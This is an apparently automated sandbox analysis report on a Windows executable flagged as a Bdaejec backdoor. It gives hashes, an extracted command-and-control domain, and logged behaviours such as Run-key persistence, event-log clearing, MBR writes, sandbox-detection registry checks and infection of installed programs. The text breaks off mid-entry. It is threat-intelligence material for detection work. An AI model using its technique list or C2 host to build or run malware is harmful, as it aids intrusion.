Analysis
-
max time kernel
150s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
15-11-2024 02:03
Static task
static1
Behavioral task
behavioral1
Sample
c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe
Resource
win10v2004-20241007-en
General
-
Target
c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe
-
Size
1013KB
-
MD5
84138dffdbd652ba89baed49cc815b6a
-
SHA1
841af40691b900f06217dc0b0af28d4fef0245a4
-
SHA256
c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e
-
SHA512
9aff34103afc917c1e1fbef62a4639a2a6249a295bc05e0fb812d1f64821e3929142a5b51c626aca66668bda9a05a08c8ea037c5b56c298eaf3e424916c20b1b
-
SSDEEP
24576:BgVo+DZba0sLgKNCAZlcLMP8VoapQrUDz/JOop+mHDTOe51K:So+DKtCAZlzPYeUxO2hKez
Malware Config
Extracted
bdaejec
ddos.dnsnb8.net
Signatures
-
Bdaejec family
-
Detects Bdaejec Backdoor. 1 IoCs
Bdaejec is backdoor written in C++.
Processes:
resource yara_rule behavioral2/memory/5060-1729-0x0000000000640000-0x0000000000649000-memory.dmp family_bdaejec_backdoor -
Suspicious use of NtCreateUserProcessOtherParentProcess 25 IoCs
Processes:
powershell.EXEsvchost.exedescription pid process target process PID 2024 created 616 2024 powershell.EXE winlogon.exe PID 2404 created 3948 2404 svchost.exe dControl.exe PID 2404 created 3948 2404 svchost.exe dControl.exe PID 2404 created 3948 2404 svchost.exe dControl.exe PID 2404 created 3948 2404 svchost.exe dControl.exe PID 2404 created 3948 2404 svchost.exe dControl.exe PID 2404 created 3948 2404 svchost.exe dControl.exe PID 2404 created 3948 2404 svchost.exe dControl.exe PID 2404 created 3948 2404 svchost.exe dControl.exe PID 2404 created 3948 2404 svchost.exe dControl.exe PID 2404 created 3948 2404 svchost.exe dControl.exe PID 2404 created 3948 2404 svchost.exe dControl.exe PID 2404 created 3948 2404 svchost.exe dControl.exe PID 2404 created 3948 2404 svchost.exe dControl.exe PID 2404 created 3948 2404 svchost.exe dControl.exe PID 2404 created 3948 2404 svchost.exe dControl.exe PID 2404 created 3948 2404 svchost.exe dControl.exe PID 2404 created 3948 2404 svchost.exe dControl.exe PID 2404 created 3948 2404 svchost.exe dControl.exe PID 2404 created 3948 2404 svchost.exe dControl.exe PID 2404 created 3948 2404 svchost.exe dControl.exe PID 2404 created 3948 2404 svchost.exe dControl.exe PID 2404 created 3948 2404 svchost.exe dControl.exe PID 2404 created 3948 2404 svchost.exe dControl.exe PID 2404 created 3948 2404 svchost.exe dControl.exe -
Processes:
powershell.EXEpowershell.exepowershell.exepowershell.exepid process 2024 powershell.EXE 2096 powershell.exe 4344 powershell.exe 1832 powershell.exe -
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
WaaSMedicAgent.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" WaaSMedicAgent.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\KktXMQ.exe aspack_v212_v242 -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exewww.XClient.exeKktXMQ.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation www.XClient.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation KktXMQ.exe -
Drops startup file 2 IoCs
Processes:
www.XClient.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\www.XClient.lnk www.XClient.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\www.XClient.lnk www.XClient.exe -
Executes dropped EXE 32 IoCs
Processes:
dControl.exewww.rotkit.exewww.XClient.exeKktXMQ.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exewww.XClient.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exewww.XClient.exedControl.exedControl.exedControl.exepid process 4656 dControl.exe 740 www.rotkit.exe 3936 www.XClient.exe 5060 KktXMQ.exe 4024 dControl.exe 3948 dControl.exe 2732 dControl.exe 5008 dControl.exe 1512 dControl.exe 4276 dControl.exe 4892 dControl.exe 1580 dControl.exe 3056 dControl.exe 4344 dControl.exe 3668 dControl.exe 3144 dControl.exe 2296 dControl.exe 2448 www.XClient.exe 1384 dControl.exe 2628 dControl.exe 1196 dControl.exe 5060 dControl.exe 4376 dControl.exe 2600 dControl.exe 3852 dControl.exe 4368 dControl.exe 1852 dControl.exe 976 dControl.exe 2812 www.XClient.exe 4564 dControl.exe 592 dControl.exe 4848 dControl.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx svchost.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
www.XClient.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\www.XClient = "C:\\Users\\Public\\www.XClient.exe" www.XClient.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
svchost.exedescription ioc process File opened (read-only) \??\B: svchost.exe File opened (read-only) \??\T: svchost.exe File opened (read-only) \??\V: svchost.exe File opened (read-only) \??\Y: svchost.exe File opened (read-only) \??\Z: svchost.exe File opened (read-only) \??\K: svchost.exe File opened (read-only) \??\W: svchost.exe File opened (read-only) \??\R: svchost.exe File opened (read-only) \??\X: svchost.exe File opened (read-only) \??\A: svchost.exe File opened (read-only) \??\E: svchost.exe File opened (read-only) \??\L: svchost.exe File opened (read-only) \??\N: svchost.exe File opened (read-only) \??\O: svchost.exe File opened (read-only) \??\P: svchost.exe File opened (read-only) \??\Q: svchost.exe File opened (read-only) \??\S: svchost.exe File opened (read-only) \??\G: svchost.exe File opened (read-only) \??\H: svchost.exe File opened (read-only) \??\I: svchost.exe File opened (read-only) \??\J: svchost.exe File opened (read-only) \??\M: svchost.exe File opened (read-only) \??\U: svchost.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 18 ip-api.com -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
wmiprvse.exedescription ioc process File opened for modification \??\PHYSICALDRIVE0 wmiprvse.exe -
AutoIT Executable 26 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule behavioral2/memory/4656-337-0x0000000000400000-0x00000000004CD000-memory.dmp autoit_exe behavioral2/memory/4024-360-0x0000000000400000-0x00000000004CD000-memory.dmp autoit_exe behavioral2/memory/2732-1428-0x0000000000400000-0x00000000004CD000-memory.dmp autoit_exe behavioral2/memory/3948-1498-0x0000000000400000-0x00000000004CD000-memory.dmp autoit_exe behavioral2/memory/5008-1638-0x0000000000400000-0x00000000004CD000-memory.dmp autoit_exe behavioral2/memory/1512-1819-0x0000000000400000-0x00000000004CD000-memory.dmp autoit_exe behavioral2/memory/4276-1911-0x0000000000400000-0x00000000004CD000-memory.dmp autoit_exe behavioral2/memory/4892-2006-0x0000000000400000-0x00000000004CD000-memory.dmp autoit_exe behavioral2/memory/1580-2109-0x0000000000400000-0x00000000004CD000-memory.dmp autoit_exe behavioral2/memory/3056-2203-0x0000000000400000-0x00000000004CD000-memory.dmp autoit_exe behavioral2/memory/4344-2293-0x0000000000400000-0x00000000004CD000-memory.dmp autoit_exe behavioral2/memory/3668-2384-0x0000000000400000-0x00000000004CD000-memory.dmp autoit_exe behavioral2/memory/3144-2478-0x0000000000400000-0x00000000004CD000-memory.dmp autoit_exe behavioral2/memory/2296-2570-0x0000000000400000-0x00000000004CD000-memory.dmp autoit_exe behavioral2/memory/1384-2946-0x0000000000400000-0x00000000004CD000-memory.dmp autoit_exe behavioral2/memory/2628-3042-0x0000000000400000-0x00000000004CD000-memory.dmp autoit_exe behavioral2/memory/1196-3134-0x0000000000400000-0x00000000004CD000-memory.dmp autoit_exe behavioral2/memory/5060-3229-0x0000000000400000-0x00000000004CD000-memory.dmp autoit_exe behavioral2/memory/4376-3320-0x0000000000400000-0x00000000004CD000-memory.dmp autoit_exe behavioral2/memory/2600-3409-0x0000000000400000-0x00000000004CD000-memory.dmp autoit_exe behavioral2/memory/3852-3498-0x0000000000400000-0x00000000004CD000-memory.dmp autoit_exe behavioral2/memory/4368-3588-0x0000000000400000-0x00000000004CD000-memory.dmp autoit_exe behavioral2/memory/1852-3679-0x0000000000400000-0x00000000004CD000-memory.dmp autoit_exe behavioral2/memory/976-3769-0x0000000000400000-0x00000000004CD000-memory.dmp autoit_exe behavioral2/memory/4564-4143-0x0000000000400000-0x00000000004CD000-memory.dmp autoit_exe behavioral2/memory/592-4233-0x0000000000400000-0x00000000004CD000-memory.dmp autoit_exe -
Drops file in System32 directory 15 IoCs
Processes:
powershell.EXEsvchost.exesvchost.exeOfficeClickToRun.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Tasks\www.XClient svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 2024 set thread context of 1184 2024 powershell.EXE dllhost.exe -
Processes:
resource yara_rule C:\Users\Public\dControl.exe upx behavioral2/memory/4656-15-0x0000000000400000-0x00000000004CD000-memory.dmp upx behavioral2/memory/4656-337-0x0000000000400000-0x00000000004CD000-memory.dmp upx behavioral2/memory/4024-360-0x0000000000400000-0x00000000004CD000-memory.dmp upx behavioral2/memory/2732-1428-0x0000000000400000-0x00000000004CD000-memory.dmp upx behavioral2/memory/3948-1498-0x0000000000400000-0x00000000004CD000-memory.dmp upx behavioral2/memory/5008-1638-0x0000000000400000-0x00000000004CD000-memory.dmp upx behavioral2/memory/1512-1819-0x0000000000400000-0x00000000004CD000-memory.dmp upx behavioral2/memory/4276-1911-0x0000000000400000-0x00000000004CD000-memory.dmp upx behavioral2/memory/4892-2006-0x0000000000400000-0x00000000004CD000-memory.dmp upx behavioral2/memory/1580-2109-0x0000000000400000-0x00000000004CD000-memory.dmp upx behavioral2/memory/3056-2203-0x0000000000400000-0x00000000004CD000-memory.dmp upx behavioral2/memory/4344-2293-0x0000000000400000-0x00000000004CD000-memory.dmp upx behavioral2/memory/3668-2384-0x0000000000400000-0x00000000004CD000-memory.dmp upx behavioral2/memory/3144-2478-0x0000000000400000-0x00000000004CD000-memory.dmp upx behavioral2/memory/2296-2570-0x0000000000400000-0x00000000004CD000-memory.dmp upx behavioral2/memory/1384-2946-0x0000000000400000-0x00000000004CD000-memory.dmp upx behavioral2/memory/2628-3042-0x0000000000400000-0x00000000004CD000-memory.dmp upx behavioral2/memory/1196-3134-0x0000000000400000-0x00000000004CD000-memory.dmp upx behavioral2/memory/5060-3229-0x0000000000400000-0x00000000004CD000-memory.dmp upx behavioral2/memory/4376-3320-0x0000000000400000-0x00000000004CD000-memory.dmp upx behavioral2/memory/2600-3409-0x0000000000400000-0x00000000004CD000-memory.dmp upx behavioral2/memory/3852-3498-0x0000000000400000-0x00000000004CD000-memory.dmp upx behavioral2/memory/4368-3588-0x0000000000400000-0x00000000004CD000-memory.dmp upx behavioral2/memory/1852-3679-0x0000000000400000-0x00000000004CD000-memory.dmp upx behavioral2/memory/976-3769-0x0000000000400000-0x00000000004CD000-memory.dmp upx behavioral2/memory/4564-4143-0x0000000000400000-0x00000000004CD000-memory.dmp upx behavioral2/memory/592-4166-0x0000000000400000-0x00000000004CD000-memory.dmp upx behavioral2/memory/592-4233-0x0000000000400000-0x00000000004CD000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
Processes:
KktXMQ.exedescription ioc process File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe KktXMQ.exe File opened for modification C:\Program Files (x86)\Windows Mail\wab.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jarsigner.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\unpack200.exe KktXMQ.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSOHTMED.EXE KktXMQ.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE KktXMQ.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\MixedRealityPortal.Brokered.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\rmiregistry.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\servertool.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\java.exe KktXMQ.exe File opened for modification C:\Program Files\VideoLAN\VLC\vlc-cache-gen.exe KktXMQ.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\LocalBridge.exe KktXMQ.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\notification_helper.exe KktXMQ.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE KktXMQ.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\ktab.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\native2ascii.exe KktXMQ.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Microsoft.MicrosoftSolitaireCollection.exe KktXMQ.exe File opened for modification C:\Program Files (x86)\Windows Mail\wabmig.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\java-rmi.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\orbd.exe KktXMQ.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\officeappguardwin32.exe KktXMQ.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe KktXMQ.exe File opened for modification C:\Program Files (x86)\Google\Update\Install\{ACF3742B-09B5-421B-BDF2-BEE548AB1938}\chrome_installer.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\java.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jps.exe KktXMQ.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe KktXMQ.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe KktXMQ.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\javaws.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\jp2launcher.exe KktXMQ.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\WORDICON.EXE KktXMQ.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exe KktXMQ.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleCrashHandler.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\rmiregistry.exe KktXMQ.exe File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe KktXMQ.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe KktXMQ.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\ssvagent.exe KktXMQ.exe File opened for modification C:\Program Files\Windows Mail\wab.exe KktXMQ.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\3DViewer.exe KktXMQ.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe KktXMQ.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe KktXMQ.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\msoadfsb.exe KktXMQ.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSOUC.EXE KktXMQ.exe File opened for modification C:\Program Files\Mozilla Firefox\private_browsing.exe KktXMQ.exe File opened for modification C:\Program Files\Mozilla Firefox\uninstall\helper.exe KktXMQ.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\javaw.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jstack.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\rmiregistry.exe KktXMQ.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX45.exe KktXMQ.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\CLVIEW.EXE KktXMQ.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\javac.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jstatd.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jjs.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\javacpl.exe KktXMQ.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\SETLANG.EXE KktXMQ.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdate.exe KktXMQ.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\msoev.exe KktXMQ.exe File opened for modification C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe KktXMQ.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\fmui\fmui.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\keytool.exe KktXMQ.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\policytool.exe KktXMQ.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe KktXMQ.exe -
Drops file in Windows directory 5 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 37 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
www.rotkit.exedControl.exepowershell.exepowershell.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exewww.XClient.exedControl.exedControl.execmd.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exewww.XClient.exedControl.exeKktXMQ.exeschtasks.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exewww.XClient.exepowershell.exedControl.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language www.rotkit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dControl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dControl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dControl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dControl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dControl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dControl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dControl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language www.XClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dControl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dControl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dControl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dControl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dControl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dControl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dControl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dControl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dControl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dControl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language www.XClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dControl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language KktXMQ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dControl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dControl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dControl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dControl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dControl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dControl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dControl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dControl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language www.XClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dControl.exe -
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried 